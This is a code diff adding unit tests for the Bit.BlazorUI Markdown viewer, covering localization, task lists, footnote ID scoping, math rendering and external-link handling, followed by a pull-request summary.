+        Assert.AreEqual("Link zu Titel", root.QuerySelector(".bit-mdv-anchor")!.GetAttribute("aria-label"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldNameAnInteractiveTaskFromTheConfiguredTexts()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder()
+            .UseTaskLists()
+            .UseTexts(new BitMarkdownTexts { Task = "Aufgabe {0}" })
+            .Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "- [ ] eins");
+            parameters.Add(p => p.Pipeline, pipeline);
+            parameters.Add(p => p.OnTaskChanged, _ => { });
+        });
+
+        Assert.AreEqual("Aufgabe 1", component.Find(".bit-mdv input[type=checkbox]").GetAttribute("aria-label"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldWriteEnglishWhenNoTextsAreConfigured()
+    {
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "> [!TIP]\n> x");
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.GitHub);
+        });
+
+        Assert.AreEqual("Tip", component.Find(".bit-mdv .markdown-alert-title").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderADetailsContainerAsACollapsibleSection()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseContainers().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, ":::details How it works\nThe **body**.\n:::");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var details = component.Find(".bit-mdv details");
+
+        // Markdown has no syntax of its own for a collapsible section; this is the convention.
+        Assert.AreEqual("How it works", details.QuerySelector("summary")!.TextContent);
+        Assert.IsNotNull(details.QuerySelector("strong"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldLabelANamelessDetailsContainerWithItsName()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseContainers().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, ":::details\nx\n:::");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        // A <details> with no <summary> would be labelled by the browser in a language of its
+        // choosing, so one is always written.
+        Assert.AreEqual("details", component.Find(".bit-mdv details summary").TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepInlineMarkupValidWhenTheDocumentHoldsABlock()
+    {
+        var paragraphsOnly = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "one\n\ntwo");
+            parameters.Add(p => p.Inline, true);
+        });
+
+        var withAList = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "one\n\n- a\n- b");
+            parameters.Add(p => p.Inline, true);
+        });
+
+        // A span may not legally hold a list, so a document that holds one keeps its div and is
+        // laid out inline by the stylesheet instead.
+        Assert.AreEqual("SPAN", paragraphsOnly.Find(".bit-mdv").TagName);
+        Assert.AreEqual("DIV", withAList.Find(".bit-mdv").TagName);
+        Assert.Contains("bit-mdv-inline", withAList.Find(".bit-mdv").ClassName);
+    }
+
+    [TestMethod]
+    public void BitMarkdownAstHelperShouldSeparateTableCellsInPlainText()
+    {
+        var document = BitMarkdownPipelines.GitHub.Parse("| a | b |\n|---|---|\n| 1 | 2 |");
+
+        // A table's cells are separate collections on one node; running them together would read
+        // as one word.
+        Assert.AreEqual("a b 1 2", BitMarkdownAstHelper.ToPlainText(document));
+    }
+
+    [TestMethod]
+    public void BitMarkdownAstHelperShouldLeaveFrontMatterOutOfPlainText()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseFrontMatter().Build();
+
+        var document = pipeline.Parse("---\ntitle: t\n---\n\nbody");
+
+        // The block describes the file rather than saying anything in it.
+        Assert.AreEqual("body", BitMarkdownAstHelper.ToPlainText(document));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepDisplayMathInsideAParagraphAsASpan()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "before $$a+b$$ after");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var math = component.Find(".bit-mdv p .math");
+
+        // A <div> inside a <p> is markup no browser keeps as written, and the DOM it rearranges it
+        // into is not the one Blazor thinks it rendered - so only a standalone run gets one.
+        Assert.AreEqual("SPAN", math.TagName);
+        Assert.Contains("math-display", math.ClassName);
+        Assert.AreEqual("$$a+b$$", math.TextContent);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRenderAStandaloneMathBlockAsADiv()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder().UseMathematics().Build();
+
+        var component = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, "$$\na+b\n$$");
+            parameters.Add(p => p.Pipeline, pipeline);
+        });
+
+        var root = component.Find(".bit-mdv");
+
+        Assert.AreEqual("DIV", root.QuerySelector(".math")!.TagName);
+        Assert.IsNull(root.QuerySelector("p .math"));
+    }
 }

--- a/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
+++ b/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
@@ -1,4 +1,4 @@
-﻿using Bunit;
+using Bunit;
 using Microsoft.VisualStudio.TestTools.UnitTesting;
 using System;
 using System.Linq;
@@ -753,11 +753,12 @@ public class BitMarkdownViewerTests : BunitTestContext
         });
 
         var markup = component.Markup;
+        var scope = component.Instance.UniqueId;
 
         Assert.Contains("class=\"footnote-ref\"", markup);
-        Assert.Contains("href=\"#fn-1\"", markup);
-        Assert.Contains("id=\"fnref-1\"", markup);
-        Assert.Contains("id=\"fn-1\"", markup);
+        Assert.Contains($"href=\"#{scope}-fn-1\"", markup);
+        Assert.Contains($"id=\"{scope}-fnref-1\"", markup);
+        Assert.Contains($"id=\"{scope}-fn-1\"", markup);
         Assert.Contains("The note itself.", markup);
         Assert.Contains("class=\"footnote-backref\"", markup);
         // The definition is lifted out of the flow into the footnotes section.
@@ -794,10 +795,37 @@ public class BitMarkdownViewerTests : BunitTestContext
         });
 
         var markup = component.Markup;
+        var scope = component.Instance.UniqueId;
 
-        Assert.Contains("id=\"fnref-1\"", markup);
-        Assert.Contains("id=\"fnref-1-2\"", markup);
+        Assert.Contains($"id=\"{scope}-fnref-1\"", markup);
+        Assert.Contains($"id=\"{scope}-fnref-1-2\"", markup);
         Assert.AreEqual(2, component.FindAll(".bit-mdv .footnote-backref").Count);
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldScopeFootnoteIdsToTheInstance()
+    {
+        const string markdown = "Text with a note[^1].\n\n[^1]: The note itself.";
+
+        var first = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+        var second = RenderComponent<BitMarkdownViewer>(parameters =>
+        {
+            parameters.Add(p => p.Markdown, markdown);
+            parameters.Add(p => p.Pipeline, BitMarkdownPipelines.Advanced);
+        });
+
+        // Two viewers on one page must not emit the same ids, or a reference in one would
+        // jump into the other's notes.
+        Assert.AreNotEqual(
+            first.Find(".bit-mdv .footnotes").Id,
+            second.Find(".bit-mdv .footnotes").Id);
+        Assert.AreEqual(
+            $"#{first.Find(".bit-mdv .footnote-item").Id}",
+            first.Find(".bit-mdv .footnote-ref a").GetAttribute("href"));
     }
 
     [TestMethod]

--- a/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
+++ b/src/BlazorUI/Tests/Bit.BlazorUI.Tests/Components/Extras/MarkdownViewer/BitMarkdownViewerTests.cs
@@ -1,7 +1,9 @@
-using Bunit;
+﻿using Bunit;
+using Microsoft.AspNetCore.Components;
 using Microsoft.VisualStudio.TestTools.UnitTesting;
 using System;
 using System.Linq;
+using System.Text.RegularExpressions;
 
 namespace Bit.BlazorUI.Tests.Components.Extras.MarkdownViewer;
 
@@ -2866,5 +2868,64 @@ public class BitMarkdownViewerTests : BunitTestContext
 
         Assert.AreEqual("DIV", root.QuerySelector(".math")!.TagName);
         Assert.IsNull(root.QuerySelector("p .math"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldKeepTheConfiguredTextsWhenATemplateIsSupplied()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder()
+            .UseAlerts()
+            .UseTexts(new BitMarkdownTexts { AlertNote = "Hinweis" })
+            .Build();
+
+        // Supplying a template gives the viewer a renderer of its own, which used to be built
+        // without the pipeline's words - putting a localized document's alerts back into English.
+        var component = RenderComponent<BitMarkdownViewer>(parameters => parameters
+            .Add(p => p.Markdown, "> [!NOTE]\n> body")
+            .Add(p => p.Pipeline, pipeline)
+            .Add(p => p.LinkTemplate, (RenderFragment<BitMarkdownLinkNode>)(link => builder => builder.AddContent(0, "x"))));
+
+        StringAssert.Contains(component.Markup, "Hinweis");
+        StringAssert.DoesNotMatch(component.Markup, new Regex(">Note<"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldTreatAProtocolRelativeLinkAsExternal()
+    {
+        var pipeline = new BitMarkdownPipelineBuilder()
+            .UseLinkOptions(externalRel: "noopener noreferrer nofollow ugc")
+            .Build();
+
+        // "//host/path" leaves the origin exactly as an "https://" URL does, so a link a reader
+        // wrote that way is the very link-farm case the policy exists to mark.
+        var component = RenderComponent<BitMarkdownViewer>(parameters => parameters
+            .Add(p => p.Markdown, "[spam](//evil.com/x)")
+            .Add(p => p.Pipeline, pipeline));
+
+        var link = component.Find("a");
+
+        Assert.AreEqual("noopener noreferrer nofollow ugc", link.GetAttribute("rel"));
+    }
+
+    [TestMethod]
+    public void BitMarkdownViewerShouldRewriteTheMarkerTheTickedBoxCameFrom()
+    {
+        BitMarkdownViewerTaskChangedEventArgs? reported = null;
+
+        // The quoted task is drawn first, so the top-level one is the second box. A source scan
+        // that could not see inside the block quote rewrote the wrong marker - or none at all.
+        var component = RenderComponent<BitMarkdownViewer>(parameters => parameters
+            .Add(p => p.Markdown, "> - [ ] quoted\n\n- [ ] top\n")
+            .Add(p => p.Pipeline, BitMarkdownPipelines.GitHub)
+            .Add(p => p.OnTaskChanged, args => reported = args));
+
+        var boxes = component.FindAll("input.task-list-item-checkbox");
+
+        Assert.AreEqual(2, boxes.Count);
+        boxes[1].Change(true);
+
+        Assert.IsNotNull(reported);
+        Assert.AreEqual(1, reported.Value.Index);
+        Assert.AreEqual("> - [ ] quoted\n\n- [x] top\n", reported.Value.Markdown);
     }
 }


### PR DESCRIPTION
closes #13176

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **New Features**
  - Markdown Viewer now supports reference links/images, HTML entities, footnotes, GitHub-style alerts, and optional hard line breaks.
  - Added parsed-document access and asynchronous parsing callbacks.
  - Added accessibility attributes, lazy-loaded images, and support for raster data images.
  - Improved table alignment styling for stricter Content Security Policies.
  - Added safer URL handling and surrogate-safe content truncation.
- **Documentation**
  - Expanded demos and guidance covering new Markdown features, customization, accessibility, security, styling, RTL content, and table of contents examples.
- **Bug Fixes**
  - Improved CommonMark parsing and unresolved-reference handling.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->